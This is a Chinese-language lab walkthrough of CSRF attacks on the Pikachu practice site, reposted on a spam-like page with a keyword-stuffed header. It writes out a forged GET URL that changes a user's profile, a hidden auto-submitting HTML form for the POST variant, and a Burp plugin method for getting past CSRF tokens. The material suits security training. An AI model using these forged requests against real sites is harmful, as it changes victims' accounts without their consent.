当前位置: 首页 > news >正文

徐州招聘网seo免费课程视频

徐州招聘网,seo免费课程视频,5自己建网站,高端网站建设策划CSRF: 介绍: Cross-site request forgery简称为"CSRF”。 在CSF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接) 然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了&#xff0…

CSRF:

介绍:

Cross-site request forgery简称为"CSRF”。

在CSF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接)

然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了(本题是修改个人信息)。

所以CSRF攻击也被称为为"one click'"攻击。

1.CSRF(get):

我们先登录lucy的账号,点击修改信息,顺便用bp抓个包。

成功抓到数据包,看到get请求:


GET /vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=beijing&email=lucy%40pikachu.com&submit=submit
http://127.0.0.1/pikachu//vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=beijing&email=lucy%40pikachu.com&submit=submit
我们把性别改成男:
http://127.0.0.1/pikachu//vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=12345678922&add=beijing&email=lucy%40pikachu.com&submit=submit

若lucy此时登录了该网站,点击了我们构造的 url 就会修改个人信息。

这里也可以使用一些短链接的方式。lucy访问该网站即可修改信息。

2.CSRF(post):

这里依旧拿lucy的个人信息实验,我们点击随便修改一下个人信息,顺便bp抓包。

此时 lucy 信息:

post传参的话,需要我们自己创一个表单,进行提交。

sex=boy&phonenum=111111&add=beijing&email=lucy%40pikachu.com&submit=submit
--------------------
我们自己创一个html的文件,放到服务器上,
<html><script>                                                                                                       <!-- 这个script是用来自动提交表单的 -->window.onload = function() {document.getElementById("submit").click();}</script>              <body><form action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">    <input type="hidden" name="sex" value="boy" /><input type="hidden" name="phonenum" value="111222" /><input type="hidden" name="add" value="beijing" /><input type="hidden" name="email" value="lucy@pikachu.com" /><input type="hidden" name="submit" value="submit" /><input id="submit" type="submit" value="Submit request" style="display:none"/>                    <!-- style设置为display:none起到隐藏submit按钮的作用 --></form></body>
</html> 

利用phpstudy将文件路径放到pikachu目录下,访问后修过成功。

http://127.0.0.1/pikachu/srf_post.php

3.CSRF Token:

这个时候,我们可以利用 burp suite 的插件 CSRF Token Tracker 来绕过

此时lucy个人信息如下,和抓包信息。

插件信息:

修改数据包,刷新lucy的个人信息即可发现数据被更改。

http://www.15wanjia.com/news/165050.html

相关文章:

  • 做网站放到百度上需要什么个人网站建设教学视频
  • 石家庄网站建设制作北京电子商务网站建设
  • 做网站的系统嘉兴做毛织的有哪些网站
  • 网站备案什么鬼自己的电脑可以做网站服务器
  • 网站排名优化推广html编写软件
  • 企业网站建设开发服务江苏有哪些做网站建设的公司
  • 优秀手机网站电子商务网站经营性icp
  • 免费wap自助建站火星建站做旅游海报哪个网站好免费的
  • 网站目标定位概念南通工程建设信息网站
  • 网站开发的概要设计模板好的企业官网建设公司
  • 合肥建站方案微信上发的链接网站怎么做的
  • 重庆网站维护公司注册空壳公司判几年
  • 沈阳网站设计运营公司软件商店最新版本
  • 烟台定制网站建设公司oa系统的功能和作用
  • 统一门户网站做网站投注代理犯罪吗
  • 团购网站策划wordpress 百度文库
  • 给企业做网站 工作个人主页文案
  • 聚美优品网站建设主题网站建设存在问题
  • 怎样将自己做的网站给别人看企业是指什么
  • 免费网站下载app软件免费wordpress多功能主题 cosy
  • 建设网站必备的开发工具网络平台设计公司广东
  • 专业网站建设分为8步网站建设的出发点
  • 房地产网站建设价格居众装饰集团有限公司
  • 最具口碑的企业网站建设网上商城小程序源码
  • 网站线框图软件wordpress php版本
  • 承德微网站建设产品设计公司简介
  • 郑州做商城网站公司公司网站建设及维护管理总结
  • 做外贸外文网站怎么做好如何用wordpress建一个网站
  • 网站备案如何申请中文命名网页制作素材会怎么样
  • 菏泽哪里有做网站的哈尔滨网站建设效果好